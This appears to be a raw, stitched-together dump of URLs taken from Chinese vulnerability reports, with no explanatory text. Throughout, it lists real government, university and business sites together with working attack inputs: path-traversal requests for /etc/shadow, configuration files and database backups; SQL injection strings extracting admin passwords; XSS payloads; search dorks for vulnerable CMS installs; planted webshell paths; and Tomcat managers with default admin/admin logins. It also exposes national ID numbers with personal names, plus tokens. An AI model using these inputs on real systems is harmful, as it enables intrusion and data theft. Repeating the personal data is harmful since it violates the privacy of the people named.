http://www.ncinfo.gov.cn/Newsite/content_detail.asp?id=41925 http://ocp.naiep.org/login/toLogin.action http://www.dapu.com/passport-lost-2-EA5D9AF19D0101D010C9386569577D48.html http://www.dapu.com/passport-lost-2-EA5D9AF19D0101D010C9386569577D48.html http://113.140.0.50:6688/sxgd/uncheckedWebsiteList.do?charge=yes http://kled.bnu.edu.cn/ http://kled.bnu.eud.cn/admin/ http://kled.bnu.eud.cn/data/找到youwe1_ecnd.sql.txt这个数据库文件 http://kled.bnu.eud.cn/admin.php inurl:/model/TwoGradePage/CIntroduce.aspx?columnId= http://sys.zafu.edu.cn/dy/model/TwoGradePage/CIntroduce.aspx?columnId=8 http://www.sqlmap.org http://sys.zafu.edu.cn:80/dy/Error.htm http://jxt.cqedu.net/ http://wlp.loupan.com/tool/admin/login.php http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file= http://wooyun.org/bugs/wooyun-2010-065948 http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/home/cms61/tomcat6.0.33/webapps/cms/META-INF/context.xml http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/home/cufemysqlbak/cufecms6120140812.sql http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/etc/rsyncd.conf http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file=/etc/gpowersoft.scrt http://www.cufe.edu.cn/cms/web/downloadFiles.jsp?file= http://www.bucea.edu.cn/cms/web/downloadFiles.jsp?file=/home/gpower/webapps/cms/META-INF/context.xml http://www.bucea.edu.cn/cms/web/downloadFiles.jsp?file=/home/cms6_bak20140328.sql http://www.bucea.edu.cn/cms/web/downloadFiles.jsp?file=/home/gpower/webapps/cms20140328.tar.gz www.XXXXX.com?www.qq.com www.XXXXX.com#www.qq.com http://bbs.siteserver.cn/thread-34-825655.aspx#924485 javascript:alert(document.cookie) http://www.scjm.gov.cn:8080/gov/page/NewsQuery_n.jsp?ID=246 http://www.scfpym.gov.cn/scfpymlindao/zhize.asp?id=7 http://www.cdjt.gov.cn/list.jsp?type=1&bigClassID=9016118602159042431 http://www.scjgdx.gov.cn http://bbs.siteserver.cn/thread-34-825647.aspx http://ahanimal.ahmu.edu.cn/product_info.asp?id=54 http://www.zsfy.org/about.asp?a=9 
http://www.whguhao.com/about.asp?id=1 http://www.jzhlib.com/duzhe.asp?Nclass=22 http://www.hfhydro.com/en/news_info.asp?id=172 http://www.cqzjwxxk.com/about.asp?a=4 http://www.mygpstimes.com/News_Show.asp?id=237&Nclass=17 http://www.spshbx.org.cn/main1.action http://www.spshbx.org.cn/one8.jsp http://www.sxprice.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://221.3.226.148/该站点也受影响。 http://www.cytvu.net/Admin/Login.aspx http://www.csagency.com.cn/C:/ http://demo.fwwbqy.fwmys.mofcom.gov.cn/login.html jdbc:mysql://210.25.0.85:3306/smp?useOldAliasMetadataBehavior=true http://124.238.218.223:81/ inurl:jeecms/ArtiSearch.do http://www.wwxzfw.gov.cn/jeecms/ArtiSearch.do?count=10&searchKey=a%27+and+1%3D1&chnlId= http://www.cnfamily.com/family/jeecms/ArtiSearch.do?count=10&searchKey=%C1%BD%BB%E1 http://www.qsng.cn/jeecms/ArtiSearch.do?searchKey=%CA%D3%C1%A6 http://www.gykj.gov.cn/jeecms/ArtiSearch.do http://www.szwzgs.gov.cn/JeecmsH/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.cnacce.org.cn/jeecms/ArtiSearch.do?count=10&searchKey=%D5%C2%B3%CC http://61.167.199.228/kejichu/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://nurse.nfyy.com/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://itrc.jju.edu.cn/situation_policy/jeecms/ArtiSearch.do?count=10&searchKey=%C1%BD%BB%E1 http://www.chnsys.com.cn/jeecms/ArtiSearch.do?count=10&searchKey= http://www.wzsng.com/jeecms/ArtiSearch.do http://en.hnist.cn/jeecms/ArtiSearch.do?count=10&searchKey=Search+here http://www.daligl.com:8069/jinye/jeecms/ArtiSearch.do?count=10&searchKey=%D7%A8%C2%F4%B5%EA http://www.nxmy.com/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.lxst.net/fiberlms/jeecms/ArtiSearch.do?count=10&searchKey=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C%E7%B4%A2%E5%86%85%E5%AE%B9&chnlId= http://www.qqtech.com/jeecms/ArtiSearch.do?count=30&searchKey=%D5%BE%C4%DA%CB%D1%CB%F7 
http://www.tspec.cn/jeecms/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.cnbmtech.com/cms/jeecms/ArtiSearch.do?searchKey=%E6%90%9C%E7%B4%A2 http://www.junkai.net/cms/jeecms/ArtiSearch.do?count=10&searchKey=%C9%FA%CC%AC http://www.sportmonline.cn/TiCMS/jeecms/ArtiSearch.do?count=10&searchKey= http://www.qsnedu.com/jeecms/ArtiSearch.do http://www.yxren.net/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.ppack.net/cms/jeecms/ArtiSearch.do?count=15&searchKey= http://www.hohutest.com/jeecms/ArtiSearch.do?count=16&searchKey=%B9%A6%C4%DC%B2%E2%CA%D4 http://www.kangbtall.com/jeecms/ArtiSearch.do?count=10&searchKey=%BF%B9%B0%D7%CC%C0 http://www.ctctct.com/jeecms/ArtiSearch.do?count=10&searchKey=%BA%CD%C6%BD http://www.ahctc.com:8080/jyb/jeecms/ArtiSearch.do?count=10&searchKey=%E7%AB%99%E5%86%85%E5%85%A8%E6%96%87%E6%A3%80%E7%B4%A2%EF%BC%8C%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&chnlId= http://www.huaxiashangwu.com/alcase.aspx,有仅前两页就存在十余个有SQL注入漏洞的网站。 http://www.shupukang.com http://www.iest.zju.edu.cn/yanjiusuo.php?ncid=40 http://202.98.7.155/ http://202.98.7.155:9999/ http://202.98.7.155:9999/login.action http://202.98.7.155/inc/upload/1407951979.php http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd%26fstq%3D1%26from%3Dwebmap%26c%3D179%26pn%3D0%26rn%3D10%26wd%3D http://map.baidu.com/?newmap=1&shareurl=2&l=12&tn=B_NORMAL_MAP&c=13382905,3515188&s=bd&fstq=1&from=webmap&c=179&pn=0&rn=10&wd= http://www.rz.gov.cn/qysw/Search.asp?datetime=&Type=&title=%B2%E9+%D1%AF&txtitle=1 http://www.rz.gov.cn/database/Default.aspx http://www.gzlis.edu.cn/tszl/onews.asp?id=419 http://www.xhtjj.gov.cn/onews.asp?id=576 http://www.sxedu.gov.cn/XZSP/actinfo_list.asp?p_id=92 http://www.jhwczj.gov.cn/newsinfo.jsp?id=1081 http://www.ahjcy.gov.cn/jcy-news/newsinfo.jsp?id=16770 http://rd.heyuan.gov.cn/do_download.jsp?path=/do_download.jsp http://kdd.xidian.edu.cn/nv/download.php?path=../../index.php 
http://youth.cau.edu.cn/ATTACHMENT/download.php?filepath=../pages/head.php http://youxiang.100tal.com/regmail/download.action?file=plugin/MacAddressViewer/MacAddressViewer.msi http://youxiang.100tal.com/regmail/download.action?file=index.jsp http://youxiang.100tal.com/regmail/download.action?file=/plugin/../../../../../../etc/shadow http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/web.xml http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/config/core/applicationContext.xml http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/datasource.properties http://youxiang.100tal.com/regmail/download.action?file=/plugin/..//WEB-INF/classes/prop.properties jdbc:mysql://192.168.1.111:3409/regmail?zeroDateTimeBehavior=convertToNull&characterEncoding=UTF-8 http://oas.xueersi.org/ http://tieba.baidu.com/mo/q/bawuteamadd?fn=[0]&fid=[1]&team_un=[2]&type=[3 http://yingxin.ncepu.edu.cn/bulletinList.jsp?groupId=6 inurl:/ws2004/ http://www.gsfzb.gov.cn http://202.100.93.105:9090/zjgl/publicQueryCard.action http://www.sinsiu.com/ http://www.hkqx.gov.cn/admin/index.aspx http://58.215.180.214:8080/index.jspx?activedId=1&version=0 http://image.nankai.edu.cn http://image.nankai.edu.cn/images.php?im_id=243 http://211.151.9.15/balance/showConsole.action http://sectest.sinaapp.com/file_get_content.php?url=http://211.151.9.15/balance/showConsole.action http://202.204.115.59/resource/index/index.jsp http://digi.daqi.com/cgi-bin/chanpin/digi/products.cgi?kid=100000000& http://125.88.33.144/ http://58.248.56.79/cswx/wxbindform/joinClub.wx?timestamp=1407974396&wxid=oer35Pv5g-rHZav-2XNdRnE8kaFw&nonce=1910685851&signature=10c4b61377c2935ffede8968bf69704b188c5050 userId:oer35PjwP-boBLqm-zGBgLYNJzx0 tokenId:5d648ff09cdbef58 tokenId:175fdddc0256244d certId:210521198101160420 certid:440183198210056139,name:朱泽铭 certid:420116199611210046,name:李玲 certId:210106197902210328,name:王丹 https://221.224.13.120 www.sysghcw.com 
http://sns.wasu.cn/zfq/articledetail.aspx?id=246 http://60.247.8.69:7001/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/jsp/connector http://photo.hb.vnet.cn/SearchComposation.aspx?new=news&key=1 http://target:8735/tool/#upload http://target:8735/api/replypic http://www.hnwish.cn/case/jyal/ http://www.hncatv.cc/setup/ http://www.cstjb.com/setup/ http://www.cs48.com/setup/ http://www.hntbt.org.cn:8080/setup/ http://csxyz.com/setup/ http://web.api.115.com/files/download?pickcode=ew8qbpcb7dqndzfuk http://www.izhancms.com/ http://b2b.fdkjgz.com/admin/Login.aspx http://daolicloud.com/ http://124.202.141.72/ http://211.103.250.141:8081/ url:http://leleshan.leyou.com.cn/specialitem.php?scheduleid=408 http://leleshan.leyou.com.cn/specialitem.php?scheduleid=408 http://119.84.63.66/Conf/jsp/main/mainAction.do http://www.sxqxjyj.com/tools/vote.php?action=show&pollid=8 http://xashanhe.com/tools/vote.php?action=show&pollid=8 http://www.shenyie.com/tools/vote.php?action=show&pollid=8 http://hswuzhou.com//tools/vote.php?action=show&pollid=8 http://www.magicwinmail.com/success.php http://demo.magicwinmail.com:6080/ http://bbs.gexia.com http://bbs.siteserver.cn/ http://61.141.236.40/ http://61.141.236.40/welcome.jsp http://61.141.236.40/manager/html http://spdb.9588.com/main/Home/LogIn www.hrbkx.org.cn(哈尔滨市科学技术协会) www.hrbsourcing.gov.cn(中国哈尔滨服务外包网) http://vip.eduu.com/event?channel=5 http://localhost/search.asp?keyword=[sqli]&up_down=up http://myportal.super8.com.cn/ url:http://125.69.65.54:80/manager/html user:admin pass:admin url:http://125.88.103.21:80/manager/html user:tomcat pass:tomcat http://b.chinacitywater.org/news_list.php?c=7 http://tang.csair.com http://tang.csair.com/public/contact.aspx http://www.hikvision.com/en/download_more.asp?id=1388(2014-07-08) http://so.imop.us/ http://58.18.4.40/UtilAction!returnPage.action http://58.18.4.40/ user:admin pass:admin url:http://58.18.4.40:80/manager/html user:admin pass:admin 
http://www.hbqgy.cn/files/newsDetail.jsp?ID=20131013012642 http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://www.ybgj6.com/&mailid=ZC1914-Ml6Iq47sTBv3YXYlydGLI48&spam=0 http://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://www.jkbd1013.com/&mailid=ZC1914-Ml6Iq47sTBv3YXYlydGLI48&spam=0 http://*****/ http://blog.incloud.org.cn/ http://tishow.dota2.com.cn http://www.dota2bbs.org http://bbs.dota2.com.cn https://118.253.71.250/ https://118.253.71.225/ https://118.253.69.57/ http://118.253.68.112/ https://118.253.69.117/ https://118.253.66.53/ https://118.253.66.65/ http://wenku.baidu.com/link?url=pr9T46jChXOcQ4QmlAZEvU7f5mO_PUxY4h3Om9gUoaOkq2PiTYcdkwmW5MvsYJ3dWN-TaxjrsOjTT09CegWecmEoUdWJX-zY6rBkPShJXGi URL:http://www.kanbox.com/files/sendFileShareMail Method:POST filesize:336167 maillist:xxxxx@qq.com http://222.177.23.36:8080/index.do http://222.177.23.36:8080/load.do?infoId=35 http://www.chinac.com/Account/agentapply.html http://yp.zjnu.edu.cn/ypdt/index.asp http://yp.zjnu.net.cn/admin.asp http://www.ciscostation.com.cn/aboutView.jsp?id=29 http://www.csbidding.com/nhzb/ http://www.csbidding.com/invoker/JMXInvokerServlet http://www.csbidding.com/ www.csbidding.com http://news.xincheping.com/index.php?a=Proxy.getLeaveList&id=64282"eType=6 http://www.centit.com/ http://www.ldzsc.gov.cn/ http://218.92.49.74:8090/ganyunet/ http://218.92.50.139:8082/lygdhnet/ http://218.92.62.78/gnnet/ http://218.92.14.22/gynet/ http://61.132.0.36:8090/lygnet/ url:http://0531.118114.cn http://0531.118114.cn/qylist.jsp?page=16&FID=16&SID=65 http://0531.118114.cn/qylist.jsp?page=16&FID=16&SID=65 http://www.036.cn/index.action http://114.80.121.110:8990/login.do http://111.11.13.250/PTMS/getPass.asp?UID=1 http://111.11.13.250/dbBackup/download.asp?p=../&n=Web.config http://61.141.236.40/manager/status http://www.ccret.org.cn/zixundisplay.asp?id=307。刚才又看见个数据库,http://www.ccret.org.cn//data.mdb,10M多;这个是什么?http://www.ccret.org.cn/data.asp,乱码。也是数据库么? 
http://www.zzczj.gov.cn/Czgk.aspx?sel=7&iid=7980 http://www.nxczj.gov.cn/ZwgkShow.aspx?id=3&iid=1891 http://www.llygsn.gov.cn/news.aspx?fatherId=110309 http://www.dtfdpx.com/base.asp?ScClassid=522 http://www.zzhsd.com/tanchu.asp?articleid=7 http://www.zzsgzc.com/base.asp?ScClassid=513 http://www.zzsmwc.com/base.asp?scclassid=513 http://www.crtsg.cn/leftRczp.aspx?fatherId=110706 http://www.loongrise.com/base.asp?scclassid=507 http://www.vasee.com/group/view/bbs/listBbs.jsp?groupid=ff808081355fdcb8013579b528870583&categoryid=1000 http://www.vasee.com/group/view/bbs/listBbs.jsp?groupid=ff808081355fdcb8013579b528870583&categoryid=1000的categoryid参数位置也存在盲注。 http://www.vasee.com/group/view/user/userpage.jsp?groupid=ff808081355fdcb8013579b528870583&id=ff80808144cdf6cc0145356c6a752b3f&s=a1 http://xiaoyou.cup.edu.cn/client/leaveMessage.aspx?id=242 url:http://www.18bg.com/explore/ www.18bg.com/user/staff/getlist/?ipage=1&deptid=0&group=0&staffname=%25 www.18bg.com/user/staff/getlist/?ipage=1&deptid=0&group=0&staffname=%25 http://demo.acsoft.com.cn/default.aspx http://bbs.dianjian.net/ http://gd.189.cn/dwr/exec/kdxy2012Helper.checkIsExistCustNo.dwr http://gd.189.cn/internet/kdxy/index.html?=yhzq http://gd.189.cn/dwr/exec/kdxy2012Helper.checkIsExistCustNo.dwr http://nisc.ccnu.edu.cn/error.asp?fid=9&sid=40” http://beijing.baixing.com/m/oz/login www.baixing.com/weishop/u113051581.html http://beijing.baixing.com/m/shoujihaoma/a393718461.html?postSuccess=1 http://www.yijieoa.com http://www.yijieoa.com/news/Website/shtml/T-8.htm?id=2 http://42.62.65.147:8089/ http://42.62.65.147:8089/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml http://bridge.tongji.edu.cn/dama.asp http://124.128.202.20:7001/inspection) http://www.izhancms.com/ http://demo8.izhancms.com/ http://www.189.cn/zqbiz/login.jspl http://cbs.nsa.gov.cn/serverpages/searchList.jsp?keyWord=88952634&keyType=dataTitle http://gjdx.sx.118114.cn/Hangup_Desk/business/loginAction.action http://58.221.185.221:88/ 
http://blog.csdn.net/hssdw25172008/article/details/8729469 http://www.chanjet.com/workbench/card http://www.uu.com.cn/user/st#user.st/user.photo http://dev.chanjet.com/user/000000000000000000031401 http://wpzs.chanjet.com/index.html#Setting/photo http://ccpup.chanjet.com/upindex.html# http://www.uu.com.cn/user/st#user.st/user.photo/ http://dg.uninx.com:8481/dgpt/adshow.php?shopid=4 http://dg.uninx.com:8481/cms/cms_iindex.php http://goucai.touzhu.cn/acthelp/show_help.php?id=52 http://goucai.touzhu.cn/inc/ http://goucai.touzhu.cn/session/ http://goucai.touzhu.cn/php.php http://fcm.games.sina.com.cn/fcm.html http://welcome.bupt.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe23&bulletinId=7e177275-1235-11e4-acdb-2bc35b0b6e58 http://sppm.bupt.edu.cn/show_news.asp?id=xx http://sppm.bupt.edu.cn/about.asp?id=xx http://sppm.bupt.edu.cn/show_edu1.asp?id=xx http://sppm.bupt.edu.cn/show_edu2.asp?id=xx http://sppm.bupt.edu.cn/show_temp.asp?id=xx http://sppm.bupt.edu.cn/show_MPA.asp?id=xx http://sppm.bupt.edu.cn/show_students.asp?id=xx http://sppm.bupt.edu.cn/search.asp?keyword=1&x=11&y=16 http://sppm.bupt.edu.cn/system_admin/index.asp http://sppm.bupt.edu.cn/system_admin2/index.asp http://meercin.bupt.edu.cn http://ts.oooxm.com http://www.clt.com.cn/search.jspa?txt=xxx http://220.248.202.146/trans/sm/login.asp http://www.shuanghui.net/shsk/spider%20Php%20shell.php http://www.jx.10086.cn/jxzone/index.do inurl:newsDetail.do?newsId http://www.xmfls.net/list!newsDetail.do?newsId=3638 http://lianhua.xmedu.cn/list!newsDetail.do?newsId=1520&name=&id=1 http://www.xmxdzx.com/list!newsDetail.do?newsId=1343&name=&id=1 http://www.xmhmxx.com/list!newsDetail.do?newsId=20549&id=3&schoolCode=001245 http://www.tayz.cn/list!newsDetail.do?newsId=1950 http://www.xmhcxx.net/list!newsDetail.do?newsId=670&id=122&schoolCode=001245 http://www.jmqsng.com/list!newsDetail.do?newsId=891 http://218.5.65.158/list!newsDetail.do?newsId=4870&id=212&schoolCode=0208122 
http://www.118100.cn/kalaok/2014/vote.jsp?city=dongguan&match_group=baby&p=3 http://wooyun.eu5.org/upload/ http://down.qibosoft.com/down.php?v=b2b http://202.108.33.137/dama.asp www.eetop.cn百万级用户大型网站,已经联系管理员修复了,苦于提交的几个漏洞都没有获得邀请码,不得不用之前的存货再提交下。。。 http://casdu.cn http://www.nkbbs.info/ http://www.exjtu.com/ http://bbs.e23.cn/ http://tvs.tcl.com/admin/tclservice/webedior/admin/login.aspx http://www.maticsoft.com/shop.aspx http://shop2.maticsoft.cn/ http://shop2.maticsoft.cn/ueditor/net/imageDel.ashx?action=del&fileName=/目录/文件 http://shop2.maticsoft.cn/ueditor/net/imageDel.ashx?action=del&fileName=/Upload/Shop/Images/ProductThumbs/20131216/T394X510_201312161156366507813.jpg http://jpk.sicnu.edu.cn/viewdocT.asp?id=313 http://fgc.sicnu.edu.cn/sys_dwhz.asp?boardid=7 http://mail.rails.cn/nsmail/?_task=mail http://www.openwbs.com)企业建站系统,是一种全新企业建站和企业电商系统;定位于高端的企业网站建设、企业电子商务系统、企业会员管理和门户网站建设的CMS建站平台;OpenWBS功能模块非常丰富,可随意组合,用户在短时间内即可迅速架设属于自己的企业网站、电子商务网站、外贸网站、资讯门户和博客等各种类型网站,轻松生成功能强大和个性化的精美网站。 http://www.openwbs.com/ow-api/Cmd.asp http://bbs.rednet.cn/static/image/common/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://www.capub.cn:8888/ http://www.capub.cn:8888/jmx-console/ http://www.capub.cn:8888/status?full=true http://www.timber2005.com/ http://exam1.timber2005.com http://app.kekenet.com/readme.txt http://scms.swjoy.com/back/login/logout.htm http://www.swjoy.com/ http://pay.hjsm.tom.com/360.php cn:8088分站大概有400w的数据。 cn:8088这个分站的管理员用户密码,但是登录不进去,网站可能有些问题,所以就没继续渗透了。 https://www.eteams.cn/login/demo https://www.eteams.cn/profile/summary/8005824116863355409.json?_=1408094249509 url:https://www.eteams.cn/base/employee/saveProperty.json http://211.144.119.200 http://www.justsy.com/的数据。 http://www.maticsoft.com/default.htm http://shop.maticsoft.com/ http://shop1.maticsoft.cn http://shop1.maticsoft.cn/Upload/AD/32/201306251608311275682.jpg 
http://121.17.126.70/index.php/Public/pro_login/username/lanke-matao/password/e10adc3949ba59abbe56e057f20f883e/city/%E8%A1%A1%E6%B0%B4 http://www.chysoft.net/case.asp http://183.61.183.189:81/ http://183.61.183.189:81/engine/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/jsp/connector http://183.61.183.189:81/UserFiles/File/jspx.jspx http://app.finance.china.com.cn/person/detail.php?id= http://www.timber2005.com/ http://exam1.timber2005.com/default.aspx http://www.tyky.com.cn/ http://oa.lygzj.gov.cn/manager/html http://tuanwei.hbu.edu.cn/ http://tuanwei.hbu.edu.cn/tzb_old/ForgetPwd.asp?state=getUsername^Submit= http://tuanwei.hbu.edu.cn/tzb_old/more.asp?class=99999999 http://119.84.60.43:9000/superadmin/index.action http://www.sy440.com/ http://demo.yuncart.com/index.php http://gspa.nwnu.edu.cn/tszy/ http://gspa.nwnu.edu.cn/)的后台地址在网站底部有链接,但是由于需要输入管理员认证码所以弱口令的威胁减小 http://blog.vip.com/blog.php?act=content&id=3318 http://www.chysoft.net/case.asp http://183.61.183.189:81/ http://183.61.183.189:81/innet/assets/addkcbf.jsp?zckc_guid_0=1&guid=-1 http://59.46.195.190:8080/OAapp/WebObjects/OAapp.woa http://221.231.10.244/manager/html http://101.69.251.138:8888 http://lib.utibet.edu.cn/notice_duzhe.jsp?tid=tz20131115_2257 http://www.szenjie.com/ inurl:fo/home.jsp http://www.sztoxda.com/ http://www.chinatapes.com/ http://www.zkchina.com.cn/ http://www.dzydz.com/ http://www.szhms.com.cn/ http://www.szjscctv.cn/ http://www.huazengkeji.com/ http://www.sz-hws.com/ http://www.360ddz.cn/ http://www.wiseteam.net/ http://www.jcr-sensor.com/ http://www.eclink.net.cn/ http://www.jiasofa.com/ http://www.cstuniversal.com/ http://www.szkzg.com.cn/ http://website/common/uploadFile.do?fileType=productDesc http://website/common/uploadFile.do?fileType=productDesc height:20px;BORDER http://website/upload/img/productDesc/文件名.jsp) http://www.sdaxue.com/.svn/entries http://www.atwasoft.com/ http://www.xngjj.gov.cn/Website/filelist.jsp?ColumnCode=01 
http://www.xngjj.gov.cn/Website/advisoryshow.jsp?id=8440 http://www.xngjj.gov.cn/Website/newsList.jsp?ColumnCode=m0101 http://www.xngjj.gov.cn/Website/advisorylist.jsp?zx=1 http://www.ykzfgjj.com/Website/newslist.jsp?ColumnCode=m0201 http://www.ykzfgjj.com/Website/filelist.jsp?ColumnCode=02 http://www.ykzfgjj.com/Website/newsshowphoto.jsp?ColumnCode=l07 http://www.ykzfgjj.com/Website/Advisory.jsp?ColumnCode=1001 http://www.ykzfgjj.com/Website/WstcNewslist.jsp?ColumnCode=1 http://www.ykzfgjj.com/Website/newslistm8001.jsp?ColumnCode=m8001 http://www.ykzfgjj.com/Website/jlhd01.jsp?id=1 http://www.jmszfgjj.com/Website/WstcNewslist.jsp?ColumnCode=1 http://www.jmszfgjj.com/Website/OnlineSurveyResults.jsp?idhao=1 http://www.spgjj.com/Website/newslist.jsp?ColumnCode=m0102 http://www.spgjj.com/Website/jgjj01.jsp?file=05 http://www.spgjj.com/Website/newsshowphoto.jsp?ColumnCode=m0805 http://www.spgjj.com/Website/filelist.jsp?ColumnCode=m0401&file=03 http://www.lygjj.gov.cn/Website/newslist.jsp?ColumnCode=m0102 http://www.lygjj.gov.cn/Website/filelist.jsp?ColumnCode=m0401&file=03 http://www.lygjj.gov.cn/Website/newsshowphoto.jsp?ColumnCode=m0805 http://www.lygjj.gov.cn/Website/fileshow1.jsp?file=03&id=16 http://www.lygjj.gov.cn/Website/contentshow.jsp?ColumnCode=m0301 http://www.hhgjj.net/Website/filelist.jsp?ColumnCode=02 http://www.hhgjj.net/Website/WstcNewslist.jsp?ColumnCode=1 http://www.hljszgjj.com/portal/tzgg.jsp?id=18 http://www.hljszgjj.com/portal/kfsList.jsp?wa_tb701=l02 http://www.hljszgjj.com/portal/yjjdXX.jsp?id=13 http://www.sysgjj.com/Website/fileshow.jsp?id=5 http://www.sysgjj.com/Website/filelist.jsp?ColumnCode=02 http://www.sysgjj.com/Website/newsshowphoto.jsp?ColumnCode=l07 http://www.tygjj.com/Website/filelist.jsp?ColumnCode=01 http://www.tygjj.com/Website/zxlist.jsp?ColumnCode=m0101 http://books.ssap.com.cn/MallStore/Store_Periodical.aspx?bookclass=449 http://beida.yaofang.cn/index.php/admin/index http://hcm.yonyou.com/d.aspx 
http://hcm.yonyou.com/123.asa;.txt http://hcm.yonyou.com/shell.asp http://hcm.yonyou.com:80/222.rar http://www.ie.zjut.edu.cn/embed/jpadmin/managelogin.asp http://demo.dtcms.net/ http://www3.jynews.net/dianli/chaxun.asp?flag=1 http://www3.jynews.net/dianli/viewarticle.asp?id=81 http://www3.jynews.net/dianli/viewarticle.asp?id=80 http://www3.jynews.net/dianli/chaxun.asp?flag=1&select=201408 http://www.52pcb.com/ http://127.0.0.1/ajax/form.aspx?publishmentSystemID=1&action=addPost http://127.0.0.1/ajax/form.aspx?publishmentSystemID=1&action=postAllInOne http://www.cs-airport.com/BusinessDetails.aspx?id=48&iid=225 http://www.cs-airport.com/CSWap/OnlineArticleW.aspx?h=y&t=22&id=226 http://www.cs-airport.com/OnlineArticle.aspx?t=22&id=226 http://www.dgaic.gov.cn/searchArticle.jsp?id=20000021&type=0&name=%D5%FE%CE%F1%B9%AB%BF%AA&searchType=1&searchValue=1&imageField.x=0&imageField.y=0 http://gaokao.gszs.cn/ http://jygl.seentao.com/ http://www.ynnu.edu.cn/admin/databak/data_ynnu/bak07-06-17-8-13-47/ http://www.ynnu.edu.cn/admin/databak/data_ynnu/bak07-09-22-22-04-37/ http://www.ynnu.edu.cn/admin/uploadfile/201308/ http://www.ynnu.edu.cn/admin/uploadfile/201307/ url:http://218.104.65.228:8081/manager/html user:admin pass:admin http://ec.yonyou.com http://www.wowsai.com/ http://edm.wowsai.com/pma/ http://www.beijing-hyundai.com.cn/quality/t/t.aspx?id=395 http://kyc.blcu.edu.cn/xmsb/indexAction!to_index.action inurl:about/show.php inurl:show.php?lang=cn&id=19 http://192.168.2.1/advance.asp即可不经过帐号密码的认证直接获得管理员权限,进行管理操作。 http://adsite2.rayli.com.cn/RayLi_XianF/ http://www.yaofang.cn/doctor_msg.php?chat_id=3 http://123.232.123.16:9080/QCWEB/qcQueryListAction!getList.do http://www.hljdep.gov.cn/dc1_view.php?tpid=2 http://cs.nenu.edu.cn/web.rar https://i.mi.com/ https://i.mi.com/ um:admin pw:admin http://219.153.125.197:8080/ http://www.chlyj.gov.cn/MANAGE/uploadify/demo.asp http://air.fjemc.org.cn/sys/ http://air.fjemc.org.cn/files/ 
http://ugc.moji001.com/mapi/ResetPasswordBefore?E268443E43D93DAB7EBEF303BBE9642F={{mail}}&07CC694B9B3FC636710FA08B6922C42B={{timestamp}}&lan=CH http://ugc.moji001.com/sns/ResetPasswordBefore?E268443E43D93DAB7EBEF303BBE9642F={{mail}}&07CC694B9B3FC636710FA08B6922C42B={{timestamp}}&9941E268A0F6F8E2AA2898B5A522D23D={{??}}&lan=CH http://www.luminway.com/ www.luminway.com http://113.108.193.123:8089/cop http://www.colorwork.com/#create创建团队 http://www.zdpri.cn/news.asp?id=4715 http://admin.ifttt.gfan.com/ http://dj.cec.com.cn/download.Action http://pay.75510010.com:7002/ePay/rand.action http://si.chinaunicom.cn/admin/index.jsp http://hrclub.51job.com/ http://fans.51job.com/ http://hrclub.51job.com/blog/user_post.asp) http://bbs.crecg.com/portal/index.aspx http://bbs.crecg.com/Portal/fckeditor/editor/filemanager/connectors/test.html http://117.22.254.102:9999/ http://117.22.254.102:9999/zentao/user-login-L3plbnRhby8=.html http://117.22.254.102:9999/sqlbuddy/#page=home http://210.35.72.97/ pic.cnnb.com.cn/login.php ftp://www.lccz.gov.cn/ https://appleid.apple.com/signin并没有出现验证码,也没有传说中的临时锁定我的账号? 
https://www.icloud.com/上,也是如此。 http://www.bzgtjt.com/brow.asp?classid=20 http://www.bzgtjt.com/brow.asp?classid=20%20and%201=1,发现存在waf,不过waf http://www.bzgtjt.com/brow.asp?classid=20 http://www.bzzdrz.com/brow.asp?classid=4 www.bzzdrz.com/brow.asp?classid=4 http://www.bzzdrz.com/brow.asp?classid=4 http://www.bzsly.gov.cn/brow.asp?classid=4%E2%80%98 http://s.haier.com/haier/showDemands.action http://s.haier.com/haier/rain.jsp http://dp.china-airlines.com/inbound/TWE/html/ATT0.jsp?id=C1_315081800H_000030 http://sh.lezi.com/arc_list.php?tid=3 url:http://202.109.191.208:8081/ user:admin http://mail.hljzx.gov.cn/ http://old.e8088.com/1.rar于是下载下来查看。发现是数据库备份,管理员太马虎了。 http://old.e8088.com/1.rar http://220.250.64.123/zhtypeset/ http://220.250.64.123/admin.jsp http://220.250.64.123/top.jsp http://bbs.dota2.com.cn/ http://221.228.210.187:8080/log/ http://210.72.13.129 http://www.263em.com/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a http://www.srm.foxconn.com/fckeditor/editor/filemanager/connectors/test.html http://123.124.249.86/zjk/admin/ http://123.124.249.86/zjk/admin/User.aspx http://219.143.118.86/TZGG/Handler/DownloadFile.ashx?path=../../web.config http://219.143.252.238:90 www.lepao.com http://www.konkamobile.com/news.aspx?TypeId=10 http://www.cits.com.cn/ 